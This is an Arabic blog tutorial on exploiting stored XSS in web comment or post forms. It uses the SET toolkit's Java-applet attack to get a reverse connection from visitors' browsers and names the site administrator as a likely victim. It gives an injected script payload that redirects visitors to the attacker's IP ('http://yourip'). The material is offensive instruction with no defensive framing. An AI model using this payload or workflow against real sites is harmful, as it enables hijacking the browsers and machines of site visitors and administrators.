إستغلال ثغرات XSS Stored باستخدام أداة SET

تعتبر ثغرات من اخطر الثغرات الامنية في مجال الاختراق لما تمكن المخترق من القيام بعدة تحكمات واختراقات تخصص اجهزة متصفحة الموقع المصاب وقد يكون المسؤؤل عن الموقع احد هذه الضحايا .في هذه التدوينة سوف نتطرق الى كيفية استغلالها بشكل احترافي واستعمال اداة SETالشهيرة لضمان نجاح استغلال هذا النوع من الثغرات الامنية 

كما نعرف ان هذا النوع من الثغرات يمكن ان تجده في تطبيقات الويب من خلال متلا زر التعليق او اضافة موضوع او غيرها
كما في الصورة التالية
بعد تجريب اذا كانت الثغرة موجودة سواء يدويا او من خلال اداة اختبار اختراق ننتقل الى كيفية استخدام اداةSET لاستغلال هذا النوع 
بطريقة احترافية
 بعد تشغيل الاداة والولوج الى لوحة الخيارات المتنوعة كل ما علينا فعله هو
بعد اختبار هذا النوع من الهجوم والذي يستهدف مكون الجافا الموجود في المستعرض لدى المستخدمين نفوم بوضع الايبي الخاص بنا لعمل اتصال عكسي وكذلك استخدام تصميم محدد للعرض
الخطوة الاكثر اهمية هي اختيار البايلود المناسب كما هو موضح في الصورة التالية
بعدها لاتمام الاستغلال كما تريد بالفعل عليك بالذهاب الى مكان اكتشاف الثغرة الامنية وتطبيق البايلود الخاص بذلك
<script>window.location="http://yourip"</script>
كاتب الموضوع: لورانس عامر   

بقلم

محمد لحلو

المدير التقني لمدونة مجتمع الأمن المعلوماتي مدون ومغرد حول مجال الأمن المعلوماتي والحماية الإلكترونية ! مهتم بكل جديد حول المجال الأمني بصفة خاصة والتقني بصفة عامة من مواليد مدينة فاس المغرب .

2016 © جميع الحقوق محفوظة
تطوير : عدنان المجدوبي